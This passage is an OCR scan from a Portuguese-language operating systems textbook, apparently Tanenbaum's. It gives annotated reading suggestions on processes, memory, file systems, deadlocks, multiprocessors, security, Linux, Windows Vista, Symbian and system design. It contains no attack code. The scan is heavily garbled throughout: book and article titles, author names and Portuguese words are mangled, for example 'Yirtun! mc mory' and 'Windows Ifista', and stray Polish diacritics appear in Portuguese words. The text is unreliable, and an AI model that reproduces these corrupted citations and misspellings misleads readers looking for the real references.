Systems Des up j mid Imp kmentatb n {O S DI )> orga n i za d o n os 
anos pares, sao boas fontes para procurar artigos recen- 
les sobre sistemas opera donais, Alem desses, a Eu rosys 
200x Conference a eon tece anual menie e e unia ótima vi- 
trine de trabalhos de primeira dasse. Os period i cos ACM 
Tramo diom on Computer Systems e ACM SIC O PS Operating 
Systems Review rnuitas vczes publicam artigos rclevantes. 
Muitas outras conferendas da ACM, IEEE c USENIX tra¬ 
ta m de topi cos espedalizados. 


Stallings, Operatin# systems, 5. cd. 

Tambem sobre sistemas opera donais, esse isvro a boi da 
todos os tópicos tradidonais e indu i algum materia ł sobre 
sistemas distiibufdos. 

Stevens e Rago, Advmeedprogramming in the UNIXenwronmmi 
Esse livro diz como escrever programas em C qne u sam 
a interface de chamados de sistema do UNIX e a biblioteca 
C pa dra o. Os exemplos sao bascados no System V Edięao 4 
e nas versbes4.4BSD do UNIX. A relaęao entre cssas imple- 
mentaęoes e o PQS1X e descrita em detalhes, 

Tanenbaum e Woodhull, Sistemas operach mus, pro jęto e impk- 
memaędo 

Urn modo piatico dc aprender sobi e sistemas opcracio- 
nais, Esse livro disente os prindpios basicos, mas tambem 
discute em detalhes urn sistema operadonal atual r o MINJX 
3, e traz a lisiagem desse sistema como apendice. 


14.1 


Sugestóes de leituras 
ad i donais 


Nas seębes seguintes, ha algumas sugestóes de leituras 
adicionais. Diferentemente dos artigos citados nas seędes 
intituladas "Pesąuisas em./ no texto, que tratam de pes- 
quisas atuais, essas referencias sao de na turę za principal- 
mente inirodutória ou tutorial. Emretanto, podem servir 
para apresentar o materiał deste livro a partir de nma pers- 
pectiya diferente ou eom outra en fasę. 


14.1J I Trabalhos introdutórios e gerais 

Silberschatz et al., Sistemas operacbmkcom Java t 7. ed. 

Urn livro-tcxto gcral sobre sistemas opera ci on ais. Abor- 
da processos, gerenciamento de memória, gerenciamenlo de 
a mi a zen ani en to, protezo e seguranęa, sistemas distribufdos 
e algum sistemas com propósitos espeeiais. Dois estudos de 
caso sao apresentados: Lininc e Windows XR A capa e ilus- 
trada com dinossauros. A relaęao desses animais com siste¬ 
mas operadonais, se e que existe, nao esta muito clara. 


14.1.21 Processos e threads 

Andrews e Schneider, "Concepts and notalions for concur- 
rent programming" 

Tutorial c apanhado geral sobre processos e comuiii- 
caęao entre processos, incluindo espera ociosa, semaforos, 
monitores, troca de mensagens e outras tecnicas. O arti- 
go tambem m ostra como esses eon cci to s sao inscridos em 
varias linguagens de programami o. O artigo e antigo, mas 
resistiu hem ao tempo. 

Ben-Ali, Pńn ci pies of concu rrenł pro$ rammin$ 

Esse peąueno livro e totalmente direcionado a próbie- 
mas de comunicaęao entre processos. Existem capftulos so¬ 
bre exdusao mutua, semafor os, monit ores e o próbie ma do 
jantar dos filósofos, entre outros, 

Silberschatz et ab, Sistemas operadonah com Mmi 7. ed, 

Os capftulos 4 a 6 ab orda m processos e comunicaęao 
entre processos, incluindo escałonamento, seęoes crfticas, 
semaforos, mojutores e os problemas classicos de comuni- 
caęao entre processos. 
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14.1.31 Gerendamento de memória 

Denning, "Yirtun! mc mory” 

U ni arligo classico sobre muitos aspectos dc memória 
virtual. Denning foi um dos pioneiros nessa area e o inven- 
tor do conceito de conjunto de trabalho* 

Denning, "Working sets pasł and present" 

Unia boa revisao de gerendamento de memória e al- 
goritmos de paginaęao. Indu i unia bibliografia abrangente. 
Enibora muitos artigos sejam amigos, os principios aborda- 
dos permanecem os mesmos. 

Knuih, The art of Computer progmnmmg, v. .1 

O livro discute e compara algoritmos de gerendamen¬ 
to de memória, como o primeiro encaixe (firstfif), o melhor 
encaixe [bestfit) e outros* 

Silbersehatz et al. r Shtemas operadonak com .iava t 7. ed. 

Os capftulos 8 c 9 tratam de gerendamento de memó¬ 
ria, indu i udo troca de processos entre disco e memória, 
paginaęao e segmentaęao* Varit>s algoritmos de paginaęao 
sao mencionados, 

14,1.41 Entrada/saida 

Gcist e Daniel, "A continuum of disk sched u ling algorithms" 
Apresenta um algoritmo de escalonamento de disco 
generalizado, Relata simulaęoes abrangentes e mostra re- 
sultados experimentais. 

Scheible, '"A survey of storage opiions" 

Hoje cm dia exisiem muitas maneiras dc armazenar 
bits: DRAM, SRAM, SDRAM, memória Hasli, disco rfgido, 
disco flexivel, CD-ROM, DVD, lita e muitos outros. Nessc 
arligo, sao analisadas diferentes tecnologias e listados seus 
pornos fortes e fracos. 

Stan e Skadron, "Power-aware eomputing" 

Ale que alguem consiga aplicar a lei de Moore as ba- 
terias, o uso de energia vai continuar a ser urna ąuestao 
importamc nos disposilivos móveis. Daqui a algum tempo, 
pode ale ser que precisemos de sistemas operacionais que 
se preocupem com a temperatura, Esse artigo investiga al- 
gumas questoes e serve de porno de partida para outros 
cinco textos nessa edięao especiai da Computer sobre com- 
pula ęao powe r-a wa re. 

Walker c Cragon, 'Tnterrupt processing in eonem rent 
processors" 

A implementaęao de interrupęóes precisas em pro- 
ccssadores supcrescalares c urna atividade desafiadora. 
A kicia e scrializar o estado e faze-lo rapidamente. Va- 
rias quesloes e ponderaęoes sobre projetos sao disemidas 
nesse arligo. 
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14,1.51 Sistemas de arquivos 

MoKusick et al, "A fast file system for UJNJIK" 

O sistema de arquivos do UNIX foi completamente rc- 
feito para o 4.2 BSD. Esse artigo descreve o projeto do novo 
sistema de arquivos, com enfase em seu desempenho* 

Silbersehatz et ab, Sistemas operacionais com Java t 7. ed* 

Os capftulos 10 c II traiarn dc sistemas de arquivos, 
Eles cebrem as operaęoes sobre arquivos, metodos de aces- 
so, diretórios c implementaęao, entre outros tópicos, 

Stallings, OperaTmg Systems, 5. ed 

O capitulo L2 contem urna quantidade razoavel de ma¬ 
teriał sobre ambientes de seguranęa, espedalmenie sobre 
hwasores (hackers), mm e outras ameaęas. 

14,1,61 Impasses 

Coffman et al, "System deadlocks" 

Urna breve imroduęao sobre impasses, suas causas e 
como eles podoili ser evitados ou dctcctados. 

Holi, "Sonic deadlock properties of Computer Systems" 
Discussao sobre impasses. Holi introduz um modclo de 
grafo dirigido que pode ser usado para analisar algumas 
situaęóes de impasses. 

Isloor e Marsland, "The deadlock problem: An overview" 
Um unoriai sobre impasses, com enfase especiai cm 
sistemas debanco de dados, com urna variedade de modę- 
los e algoritmos, 

Shub, "A unifkd treatment of deadlock" 

Esse peąucno tuiorial resume as causas dos impasses e 
suas soluęÓes e sugere o que deve ser enfatizado quando o 
tópico for ensinado a a luno s. 

14,1,71 Sistemas operacionais multimidia 

Lee, "ParaHel vkleo servers: A tutorial" 

Muitas organ izaęóes q u erem ofcreccr vfdeo sob de¬ 
ma ri da, criandoa necessidade de semdoresde vfdeo para¬ 
lelo, tolerantes a falhas e escalavds. As principais questóes 
sobre como construf-ios sao abordadas nesse trabalho, in¬ 
du ind o a arąiiiteuua do semdor, striping, poifticas dc subs- 
tituięao, balanceamento de carga, redimdanda, protocolos 
e si nero ni za ęao. 

Leslie et al., "Tlte design and implemeniation of an operating 
system to support distributed multimedia applications" 

Muitas teiitativas de implementaęao de multimidia 
lem sido baseadas na adięao de caracterfsticas em um sis- 
tema operacional ja existente. Urna esiraiegia aUernativa 
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e recomeęar, lal como descrito nesse livro, e construlr um 
novo sistema opera clona I para imiltimfdia a partir do zero, 
sem a necessidade de conipatibilidade com as versoes ante- 
riores. O resulrado e um projeto totalmente diferente dos 
sistemas convencionais. 

Sitaram e Dan, "Multimedia seryers" 

Osi senidores multimfdia tern muitas difcrenęas com 
rdaęao aos semdores de arquivos comuns, Os autores dis- 
cutemas diferenęas cm detalhes, especialmentc nas arcas de 
escalonamenio, subsistema de armazenamenio e eaching. 

_ 14.1.81 Sistemas de multiplos 

processadores 

Ali mad, "Giganiic dusiers: Where are tliey and wliat are 
they doing?" 

Esse e um bom livro para se ter urna idcia do mvel 
dc dcscnvolvimento atual dos grandes multicomputadores. 
Ele dcscrcvc a idcia c apresenta unia visao gcral dc alguns 
grandes sistemas cm fundonamento atualmente* Considc- 
rando a lei de Moore, nao e de surpreender quc os tama- 
nlios mencionados nesse livro dupliąuem a cada dois anos. 

Dubois et al, 'Syn cli roni za lion, coherence, and event or¬ 
dę ring in muliiprocessors" 

Um unoriat sobre sinaonizaęao cm sistemas muitipro- 
cessadores de memória compartilhada. Comudo, algumas 
das idcias sao igualnieme aplicavds a monoprocessadores 
e sistemas de memória distribuida. 

Geer, "For programmers, multicore chips niean multiple 
challenges" 

Os processadores multiiuicleo ja Scio urna realidade — 
independcntemenle de os program a dores estarem prepa- 
rados para isso ou nao, Ao que parece, des nao estao pron- 
los, e a programaęao desses processadores oferece muitos 
desafios, que variam desde a escollia da ferramenta eon eta 
e a dłvisao do t rab a 1 ho em peąuenos pedaęos ate o teste 
dos resultados. 

Kant e Mohapatra, "Internet data centers" 

Os cemros de dados de Internet sao multicomputado- 
res potentes funrionando com esteroides. Eles geralmenie 
centem de ze nas ou centenas de milhares de computadores 
trabalhando cm urna unica aplicaęao. Escalabilidade, ma- 
nutenęao e tiso de energia sao questoes importantes. Essc 
atligo c uma introduęao ao terna c servc dc ponto dc par- 
tida para ąuatro artigos adicionais sobre o mesmo assunto. 

Ku mar et al, "Heterogeneous chip multiprocessors" 

Os processadores multinudeo utilizados nos computado- 
res desktop sao simćtricos — todos os nudeos sao identicos. 
En tret anto, para algumas aplicaęóes, os processadores multi- 
nudeo heterogeneos sao freguentese existem para computa- 


ęao, decodificaęao de vtdeo e de audio etc. Esse ariigo discute 
algumas ąuestoes relacionadas aos CMPs heterogeneos. 

Kwok e Ahmad, "Static scheduling algorithms for allo- 
cating directed task gra plis to multiprocessors* 

O escalonamento ótimo de trabalho cm um niulticom- 
putador ou multiprocessador e posstvcl quandoas caracte- 
nsticas dc todas as tarefas saoconhccidasantedpadamcntc, 
0 problcma e que o escalonamenio ótimo lcva muito tem¬ 
po para ser realizaclo, Nesse ariigo, os autores discutern e 
comparam 27 algoritmos conhecidos para atacar esse pro- 
bierna de diferentes maneiras. 

Rosenblum e Garfmkel "Virlual machinę monitors: Cur- 
rem technology and futurę trends* 

Esse artigo comeęa pela historia dos monitores de ma- 
quinas virmais e passa a discussao do estado atual da CPU r 
da memória e da virtuaHzaęao da E/S. Em particular, cle 
trata das areas problematicas relacionadas a todos esses 
te mas e fala sobre como os futuros eąuipamcntos podem 
minimizar os problemas, 

Whitaker et al. r "Rethinking the design of virtual machinę 
monitors" 

Muitos coniputadores possuem aspectos bizarros c di- 
ffceis de serem yirtualizados, Nesse artigo, os autores do 
sistema Denali falam sobre paravirtualizaęao, ou seja, so¬ 
bre a mudanęa do sistema operacionai hóspede, de modo 
a evitar o uso de caracterfsdcas bizarras para que eles nao 
predsem ser emu la dos. 

14.1,91 Seguranca 

Bratus, " Whal hackers learn that the rest of lis don't" 

O quc faz dos hackers pcssoas diferentes? Quais as- 
pectos sao importantes para eles, mas nao sao para pro- 
gramadores regulares? Eles tein difkuldades com APIs? 
Casos fora do comuiii sao importantes? Ficou curioso? 
Emao, Ida. 

Computer, fevcTCiro de 2000 

O Lema dessa edięao de Computer c a biometria, irazen- 
do seis artigos sobre o assunto, que abrangem desde uma 
introduęao, abordando varias tecnologias especfficas, ate 
um artigo que trata de questoes legais e de privacidade. 

Doming, Information warfare and security 

A informaęao se tornou uma arma de guerra, tamo 
miiitar quamo ct>rporaiiva. Os envolvidos nao só tentam 
atacar os sistemas de informaęoes do outro lado, como 
tambem tentam se proteger. Nesse livro fasdnante, o au¬ 
tor aborda cada tópico relacionado a estrategias de defesa e 
ataque, desde dados disfaręados ate farejadores de pacotes. 
Uma lei tura obrigatória para qualqucr pessoa senainente 
iiuercssada em seguranęa computacional. 
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Ford e Allen, *How noi lo be scen" 

Vmis, spywarc, rootkits e sistemas dc gercndamcnto 
dc dirdtos digilais tein grandę interesse cm cscondcr coi- 
sas. Esse artigo ofercce urna breve introduęao a furtividade 
em suas varias formas. 

Hal ner e Markoff, Cyberpimk 

Tres casos de itiyasoes a computadores cspalhados pefo 
mundo — realtzadas porjovens hackers — sao descritos 
ncsse materiał por urn reporter do New York Times, quc des- 
vendou a historia do verme na Internet (Markoff). 

Johnson e Jajodia, "Exploring steganography: Seeing the 
unseen" 

A esteganografia tein unia longa historia, que vem 
desde a epoca cm que o escritor raspava a ca Licea de urn 
mensageiro, tatuava u ma mensagem na cabcęa raspada c 
eriviava-a após o cabdo ter crescido. Apesar de as tecnicas 
attiais serem rnuiias vezes 'cabeludas? elas sao hoje digi- 
tais. Um bom materiał para uma introduęao completa so- 
bre o assunto e o modo como atualmente e praticada. 

Ludwig, The little kiach kook of email viruses 

Se voce querescrever progiamas antiwuse precisa sa- 
ber em detalhes como os vfms funcionam, esse e um livro 
adequado. Todo tipo de vfrus e discutido e os códigos reais 
para a maioria deles sao fornecidos cm um disco fłexfvd. 
Entrctanto, e necessario ter conhedmento profundo sobre 
a programaęao do Pentium em linguagem asscmbly. 

Mead, "Who is liable for insecure sysiems?" 

Embora a maior parte do trabalho relacionado a segu- 
ranęa de computadores trale do assunto a partir de uma 
perspectiva tecnica, da nao e a unica forma de abordar 
esse assunto. Suponha que os vcndedores dc software 
fossem l egał nieme rcspon$śveis pelos da nos causados por 
sen software problematico* E posstvel que a seguranęa 
atrafsse muito mais a alenęao dos fomecedorcs do quc 
hoje em dia r nao? Intrigado com essa possibilidade? Leia 
esse artigo. 

Milojieic, “Security and priyacy" 

A seguranęa tętn varias facetas, que incluem sistemas 
operaeionais, redes, qtiestoes de privacidade etc. Nesse ar¬ 
tigo, seis especiallstas cm seguranęa sao emrevistados sobre 
o assunto. 

Nachenberg, “Computer virus-antivirus cocvolutiorr 
Logo qtie os desenvolvedores de antivirus descobri- 
ram como detectar e neutralizar algumas ciasses de vf- 
rus de computadores, os escritores de virus comeęarain 
a aperfdęoa-Ios. Esse artigo discute o jogo de gato e rato 
disputado pelos la dos do vfrus c do aniivirus. O autor 
nao e otimista no que se refere a os escritores de antivfnis 
vencerem a guerra — uma ma noticia para os usuarios 
de computadores. 
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Pfleeger, Security in computing, 4. ed. 

Embora muitos !ivros sobre seguranęa de computa- 
dores tenhani sido piiblicados, a maioria detes aborda so- 
mente seguranęa em redes. Esse !ivro faz isso, mas tam- 
bćm apresenta tres capitulos sobre seguranęa cm sistemas 
operarionais, seguranęa de bases de dados e seguranęa de 
sistemas distribufdos. 

Sasse, “Red-eye blink, Bendy shuflle, and the Yuck factor: 
A iiser cxperienee of biomeinc airport Systems" 

O autor discute suas experiendas com o sistema de re- 
conhecimenio da ińs milizado cm um grandę nu mero de 
acroportos. Nem todas sao positivas. 

Thibadeau, “Trusted computing for disk dtivcs and other 
peripherals^ 

Se voce acha que uma unidade de disco e śimplesmen- 
te um local onde bits sao armazenados, repense esta idda. 
Unia unidade de disco moderna possui uma CPU poderosa, 
megabytes de RAM, miiltiplos canais de eoinunicaęao e ate 
sua própria ROM de inidklizaęao. Em suma. e um sistema 
coinputacional completo pronto para o ataque e que preci¬ 
sa de um sistema de proteęao próprio, Esse artigo discute a 
seguranęa das unidades de disco. 

14.1.101 Linux 

8ovet e Cesati. Understanding the Liimx kerttel 

Esse livro e provavelmenie a tnelhor discussao geral so¬ 
bre o nucleo do linux. Ele aborda processos, gerenciamento 
de memória, sistemas de arquivos, sinais e muito mais. 

IEEE, Information technolog# — Portabk operatm§ system inter- 
face. [ PQSIX ), Part /: System applmtion program interface (AP/) 
fC kmguage] 

Esse e o livro de referenda sobre o assunto. Algtmias 
partes sao realmentc bem lcgiveis, espccialmenie o Ancxo 
B, “Rationale and Notes", quc muilas vczcs esclarece o por- 
que de as eoisas setem feitas como sao. Uma vantagcm de 
recorrer ao documeiuo de referencia e que, por dcfinięao, 
nao einstein erros. Se um erro Li pograli co no nome dc urna 
macro surge no processo de edięao, ele nao e mais um erro, 
mas sini uma de fi ni ęa o ofidai. 

Fusco, The Unuxproijrdmmer'$ toolbox 

Esse livro descrcve o uso do Linux para o usuario in- 
termediario, aqnele qne conhece o basico e quer comcęar 
a explorar o funcionamcnto dos diferentes program as do 
Linux. ŚdiiGcionado a programadores cm C. 

Maxwell, Linux core ker ml commentaty 

As primeiras 400 paginas desse livro contem um sub- 
conjunto do código do nucleo do Linux. As ultinias 150 
paginas sao comentarios sobre o código, usando muito do 
estilo do !ivro classico de John Lions (1996). Se voce quer 
compreender o nucleo do Unux em lodos os sens deialhes 
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sangremos, esse e um livro bom para comeęar, mas cuida- 
do: a leitura de 40 mil linhas de C nao e para qualquer um. 

14,1,111 Windows Ifista 

Cusumano c Sclby, "How Microsoft builds software" 

Voce sempre qui$ saber como alguem podcria escre- 
ver um programa de 29 milhoes dc linhas (assim como o 
Windows 2000) c que fini ci ona sse? Para saber como o ciclo 
de construęao e teste da Microsoft e usado para gerenciar 
gran des pi oj et os de software, de u ma olhada nesse artigo. 
O procedimento e bastante instrutivo. 

Re cl o r e Newcomer, Win32 programming 

Se vocc esta procurando por um desses livros de L500 
paginas quc apresentam um resumo dc como escrever pro- 
g ram as Windows, o trabalho de Rector c Newcomer nao e 
um ma u infcio. Ele aborda janelas, disposilwos, safda gra fi- 
ca, entrada pdo leclado e mouse, impressao, gerendamen- 
lo de memória, biblioiecas e sincronizaęao, emre muitos 
outros tópicos. Ele requer conhecimemo de C ou €++. 

Russinovich c Sol om on, Microsoft Windows internat, 4. cd. 

Sc vocc quer a premier a usar o Windows, cxislcm ccn- 
lenas de livros sobre o assumo. Se voce deseja conhecer o 
fundonamcnto interno do Windows, esse livro e a sua me- 
Ihor aposta. Ele aborda divcrsos aigoritmos c estrnturas de 
dados internos com dctalhes tćcnicos sufiricntes. Ncnhum 
outro livro chega perto desse. 

14.1.121 o sistema operacional Symbian 

Cinque et al., "How do mobiles phone raił? A failure data 
analysis of Symbian OS smart phojies" 

Gosiu ma va-se dlzer que, cnquamo os computadores 
falhavam a lodo instantc, ao menos os telefones sempre 
funckmavam. Agora que os telefones sao simplesmente 
computadores de tclas pequenas, des tambem cstao fa~ 
Ihando por couta dc programas ruins, Essc artigo discutc 
os erros de software que fi zoram com que telefones e PD As 
fundonando com Symbian parassem de funcionar. 

Morris, The Symbian OS arekiiecture soumbook 

Se voce esta procurando maior riqueza de deialhes so- 
bre o Symbian, aqui e um bom lugar para comeęar. Esse 
livro aborda a arąuitetura do Symbian e todas as camadas 
com um volumc razoavel dc detalhcs c tambem apresema 
alguns cstudos dc casa. 

Stichbury e Jacobs, The accredited Symbian dewtoper pńmer 
Se voce esta interessado em saber o que precisa apren- 
der para descnvolver aplicaęoes Symbian para telefones e 
PDAs, esse !ivro cameęa com urna introduęao a linguagem 
necessaria (C++) e passa para temas como estru tura do sis¬ 


tema, sistema de arquivos, redes, cadeia de ferramentas e 
compatibilidade. 

14.1.131 Prindpios de projeto 

Brooks, O mitico hommt-mh: msaios sobre mjenhoria de software 
Fred Brooks foi um dos projetistas do OS/360 da IBM. 
Ele descobriu a duras penas o quc funciona c o quc nao 
fnnciona, As recomendaęócs dadas por esse livro intdigen- 
te, prazeroso e informalino sao tao va!kJas agora quanio 
eram ha um ą narto de seculo, quando foi escrito. 

Cooke et al., "UŃ1X and beyond: An imerview with Ken 
Thompson" 

Projetar um sistema operacional e muito mais u ma 
arie do que urna ciencia. Consequentemenie, ouvir os es- 
pecialistas nesse campo e urna boa maneira de aprender 
sobre o assimto. Eles nao sao muito mais cspecialistas do 
que Ken Thompson, coprojetista de UNIX, Infemo e Plan 
9* Nessa entrevista r Thompson fala sobre su a opinia o acer- 
ca de onde viemos e para onde estamos indo nessa area, 

Corbaió, "On buildmg systems that will fail" 

Em sua palcslra durantc o Tu ring Award, o pa i dos sis¬ 
temas de tempo compartilhado aborda niuitas das mes mas 
preocupaęoes a pre sen ta das por Brooks no O mitico homem- 
-mis. Sua condusao e que Lodos os sistemas complexos fa- 
Iharao e que, para que se lenha qualquer possibilidade dc 
sucesso, e absoluiamente essencial cvitar a complexidadc c 
luiar pcla simpliddade e elegancia no projcio. 

Crowley, Opera ting Systems: A design-o riented approach 

Muitos l!vros sobre sistemas operacionais simplesmeli¬ 
te descrevem os conccitos basicos (processos, memória vir- 
tual etc.) e trazem alguns excmplos f mas nao dizem nada 
sobre como projetar um sistema operacional. O fivro de 
Crowley e unieo e dedica quatro capim los ao assimto. 

Lampson, 'Kimś for Computer system design" 

Butler Lampson, um dos projetistas lideres mundiais 
de sistemas operacionais inovadores, coledonou muitas di- 
cas, sugestoes e orientaęoes de sens anos de experienda e 
reuriiu tudo nesse artigo informativo e interessaote. Assim 
como o livro de Brooks, essa e urna leitura necessaria para 
todos os aspirantes a projetistas de sistemas operacionais. 

Wirlh, "A pica for lean software" 

Nikłaus Wirth, um famoso e experiente projetista dc 
sistemas, tramu, nesse livro, de software simples e efiden- 
te bascado em alguns conccitos simples, cm vez da voln- 
mesa desordem apresema da por muitos software s com er- 
ciais* Ele expóe sen ponto de vista discutindo seu sistema 
Oberon um sistema operacional bascado em GUI e 
orientado a redo, que se Jimita a 200 KB r induindo o com- 
pilador Oberon e o editor dc iexio. 
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